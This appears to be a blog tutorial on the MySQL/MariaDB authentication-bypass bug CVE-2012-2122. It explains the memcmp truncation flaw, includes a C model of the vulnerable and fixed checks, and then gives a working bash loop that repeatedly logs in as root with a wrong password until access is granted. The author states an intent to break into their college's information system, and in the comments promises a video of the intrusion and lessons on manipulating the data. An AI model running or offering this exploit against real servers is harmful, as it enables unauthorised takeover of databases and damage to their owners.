Exploiting MySQL/MariaDB sql/password.c Vulnerability to gain access into MySQL Server

Hey guys, today I thought I'd talk about a vulnerability found in MySQL and MariaDB databases. I surfed and went through a lot of written material to get a proper understanding of this vulnerability. Actually, I was completely unaware of this stuff! I came to know about it when I scanned my college's Online Information System (OIS) and got an alert saying "MySQL/MariaDB sql/password.c is vulnerable". When I researched the topic, I came up with the notion of hacking into my college's information systems. Well, I will let you guys know once I successfully perform that, but right now I'm on vacation, so I'll give it a try when I move back.

This vulnerability was reported on 9 June 2012 by Sergei Golubchik, MariaDB's security coordinator, on the oss-sec mailing list, and it was assigned CVE-2012-2122. You can read the complete report at http://seclists.org/oss-sec/2012/q2/493.

According to that report, all MariaDB and MySQL versions up to and including 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are vulnerable. MariaDB fixed it in 5.1.62, 5.2.12, 5.3.6 and 5.5.23; MySQL fixed it in 5.1.63, 5.5.24 and 5.6.6.

According to Mr. Golubchik, an affected server can let an attacker log in to an account without knowing its password. When a client connects, it sends a username (here "root", which exists on almost every installation) and a token derived from the password: the server includes a random 20-byte scramble in its handshake, the client hashes its password together with that scramble, and the server's check_scramble() function in sql/password.c compares the result against the stored hash using memcmp(). The bug is in how that comparison result is returned. memcmp() returns an int, but check_scramble() returns it through a my_bool, which in MySQL is a plain char. Any non-zero result that happens to be a multiple of 256 is truncated to 0, and 0 means "match", so the login is accepted even though the password was wrong. Because the scramble is different for every connection, each attempt has roughly a 1 in 256 chance of producing such a value, which is why a few hundred attempts (about 300 on average) are enough. Two caveats: first, this only works when the platform's memcmp() can return values outside the -128..127 range; the report notes that gcc's builtin memcmp and the BSD libc memcmp are safe while the SSE-optimized memcmp in Linux glibc is not, and in practice 64-bit Linux builds were the ones confirmed exploitable. Second, the account you target must exist and must be permitted to connect from your host (a root account granted only for 'localhost' cannot be reached remotely, no matter how many attempts you make). Where both conditions hold, the attacker ends up with whatever privileges the targeted account has, which for root means complete control of the MySQL server.
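To make the truncation concrete, here is an added example in C. It is my own model, not MySQL's or MariaDB's actual sql/password.c code: it keeps the shape of check_scramble() with its my_bool return type, puts a hypothetical word-wise memcmp() stand-in (wide_memcmp, an assumption for the demo) behind it whose return values are not confined to -128..127 (the real glibc routine differs in detail; only that property is borrowed), shows the fixed form beside it, and simulates the login loop with constructed random hashes to show that roughly 1 in 256 wrong passwords gets through the vulnerable version and none through the fixed one.

```c
/* Added example (not the real sql/password.c): a model of the
 * CVE-2012-2122 truncation bug in check_scramble() and of why the
 * login loop succeeds after a few hundred tries. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* MySQL's my_bool is a plain char, not an int */

/* Stand-in for an optimized libc memcmp() that works on 32-bit words and
 * returns their arithmetic difference.  ASSUMPTION for this demo: this is
 * not glibc's SSE memcmp(); it only reproduces the property that matters,
 * a return value that is not confined to -128..127. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *p = a, *q = b;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t x = (uint32_t)p[i] | (uint32_t)p[i + 1] << 8 |
                     (uint32_t)p[i + 2] << 16 | (uint32_t)p[i + 3] << 24;
        uint32_t y = (uint32_t)q[i] | (uint32_t)q[i + 1] << 8 |
                     (uint32_t)q[i + 2] << 16 | (uint32_t)q[i + 3] << 24;
        if (x != y)
            return (int)(x - y);   /* wraps mod 2^32: non-zero, possibly huge */
    }
    for (; i < n; i++)             /* trailing bytes: classic byte difference */
        if (p[i] != q[i])
            return (int)p[i] - (int)q[i];
    return 0;
}

/* Vulnerable shape (pre-fix): the int is narrowed to char on return, so a
 * result such as 256 becomes 0, which the caller reads as "password OK". */
my_bool check_scramble_vulnerable(const uint8_t *hash_stage2,
                                  const uint8_t *hash_stage2_reassured)
{
    return wide_memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE);
}

/* Fixed shape: collapse the result to 0 or 1 before it is narrowed. */
my_bool check_scramble_fixed(const uint8_t *hash_stage2,
                             const uint8_t *hash_stage2_reassured)
{
    return wide_memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE) != 0;
}

/* The concrete failure: two hashes whose first words differ by exactly 256.
 * Returns the raw my_bool result (0 = accepted as a match). */
int crafted_pair_result(my_bool (*check)(const uint8_t *, const uint8_t *))
{
    uint8_t real[SHA1_HASH_SIZE] = {0x00, 0x01};   /* first word = 256 */
    uint8_t guess[SHA1_HASH_SIZE] = {0x00, 0x00};  /* first word = 0   */
    return check(real, guess);
}

/* Small deterministic xorshift32 generator so the simulation is repeatable. */
static uint32_t rng_state = 0x9e3779b9u;
static uint8_t rnd_byte(void)
{
    rng_state ^= rng_state << 13;
    rng_state ^= rng_state >> 17;
    rng_state ^= rng_state << 5;
    return (uint8_t)(rng_state >> 24);
}

/* Model the login loop: every connection gets a fresh random scramble, so
 * each attempt compares two effectively random 20-byte hashes (constructed
 * here, not captured from a server).  Returns how many wrong-password
 * attempts the given check accepted. */
int count_accepted(my_bool (*check)(const uint8_t *, const uint8_t *), int attempts)
{
    int accepted = 0;
    for (int i = 0; i < attempts; i++) {
        uint8_t real[SHA1_HASH_SIZE], guess[SHA1_HASH_SIZE];
        for (int j = 0; j < SHA1_HASH_SIZE; j++) real[j] = rnd_byte();
        for (int j = 0; j < SHA1_HASH_SIZE; j++) guess[j] = rnd_byte();
        if (memcmp(real, guess, SHA1_HASH_SIZE) == 0)
            continue;              /* a genuine match; not what we measure */
        if (check(real, guess) == 0)
            accepted++;
    }
    return accepted;
}

int main(void)
{
    printf("crafted pair: vulnerable=%d fixed=%d\n",
           crafted_pair_result(check_scramble_vulnerable),
           crafted_pair_result(check_scramble_fixed));
    printf("wrong passwords accepted in 100000 attempts: vulnerable=%d fixed=%d\n",
           count_accepted(check_scramble_vulnerable, 100000),
           count_accepted(check_scramble_fixed, 100000));
    return 0;
}
```

The crafted pair shows the mechanism exactly (a difference of 256 is reported as "equal"), and the simulation shows the rate: about 390 of 100000 wrong passwords get through the vulnerable check, none through the fixed one. That 1 in 256 rate is why the login loop below uses up to 1000 tries: the expected number of attempts before the first success is 256, so a few hundred is typical and 1000 covers the unlucky runs.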

How to exploit this bug?

So here comes the hacking part! With the mechanism above clear, let's move on to exploiting the bug. Follow the instructions below to perform the attack, that is, to gain access to the MySQL server.

Open your bash or shell and type the following command:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Let us explore the command a little. The for loop runs the command "mysql -u root --password=bad -h 127.0.0.1" up to 1000 times. The -u parameter sets root as the username; --password=bad supplies a deliberately wrong password (any wrong password will do, since the bug is in the comparison, not in the value you send); -h 127.0.0.1 points the client at the local server, so replace it with the target's address for a remote server; and 2>/dev/null hides the hundreds of "Access denied" errors so that only the one successful login is visible. When an attempt succeeds, the mysql client drops you into its interactive monitor; the loop waits there until you quit that session and then continues with the remaining attempts, so do your work in the session that opens.

After you run this command, wait for the server to display the following banner:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 2313

Server version: 5.3.5-0ubuntu1 (Ubuntu)

Copyright (c) 2012, 2013

That's it, you have access to the server's MySQL databases with root's privileges. Now you can execute SQL commands to read, manipulate or delete the database contents. If the loop finishes all 1000 attempts without ever showing the banner, the target is most likely running a fixed version, a build whose memcmp() is not affected, or a root account that is not allowed to connect from your host.

Have a wonderful time… Feel free to comment!


7 Comments

  1. I don't know if that is possible, but have you thought of creating video tutorials or examples? Or at least, show us some examples of what to do after we are able to exploit the mysql bug :), I mean like: I'm in the system, wow! Now... I don't know what to do :(. (I'm not asking about silly delete *.* like commands 🙂 )


    1. Well, I think I will be making a video while I hack into my college's database and will come up with another article describing the whole process step by step with a demonstration. Then I will teach you the SQL commands that are useful for communicating with the server and manipulating the data!
